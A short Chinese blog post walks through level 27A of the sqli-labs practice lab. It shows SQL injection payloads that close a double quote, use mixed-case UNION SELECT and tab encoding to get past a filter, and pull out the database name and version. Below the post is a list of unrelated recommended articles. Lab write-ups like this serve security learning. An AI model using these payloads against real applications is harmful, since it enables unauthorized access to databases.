sqllab第二十七A关通关笔记

I_WORM2024-03-20 20:00

知识点:

  • 双引号闭合
  • union select 大小写绕过
    • Union Select
  • 这里不能进行错误注入,无回显

经过测试发现这是一个双引号闭合

构造payload:id=1"%09and%091="1

页面成功回显

构造payload:id=0"%09uNion%09SElect%091,2,3%09"1

页面成功回显除了输入内容

获取数据库名和版本信息

构造payload:id=0"%09uNion%09SElect%091,database(),version()%09"1

成功获取了数据库名和版本信息

10

相关推荐
不是山谷.:.6 分钟前
前端零基础入门:WebSocket 全解析
前端·笔记·websocket·状态模式
stars-he15 分钟前
Silvaco 仿真NMOS 差分对器件剖面结构图
笔记·学习
清平乐的技术专栏26 分钟前
【FlinkSQL笔记】(二)Flink SQL 基础语法详解
笔记·sql·flink
Dontla27 分钟前
(小浪)LangGraph多Agent教程笔记(多智能体)
笔记
kobesdu30 分钟前
【ROS2实战笔记-23】参数系统中的动态参数与远程加载安全剖析
笔记·安全·slam·ros2
清钟沁桐39 分钟前
mlir 编译器学习笔记之十 -- 数据类型
笔记·学习·mlir
Pizza_Lawson44 分钟前
spinningup学习笔记(二)
笔记·学习
清钟沁桐1 小时前
mlir 编译器学习笔记之九 -- 后端生成
笔记·学习·mlir
什仙1 小时前
Ansys Maxwell 默认求解器选择
人工智能·笔记·算法·基础·ansys·maxwell
清平乐的技术专栏1 小时前
【Kafka笔记】(二)核心架构与专属名词解释
笔记·架构·kafka
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03CC-Switch & Claude 基于 Linux 服务器安装使用指南04【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法05【AI】2026 年具身智能模型和世界模型总结06几个好用的ip纯净度检测网站07装上就回不去了:CodeGraph 让 AI 编程效率飙升 92%,它到底做了什么?08裂开!ChatGPT 居然开始要手机号验证,附详细解决方法09用了半年 OpenRouter,我换到了 Ofox.ai — 两个 AI API 聚合平台的真实对比10codex app每次打开重连5次Reconnecting问题解决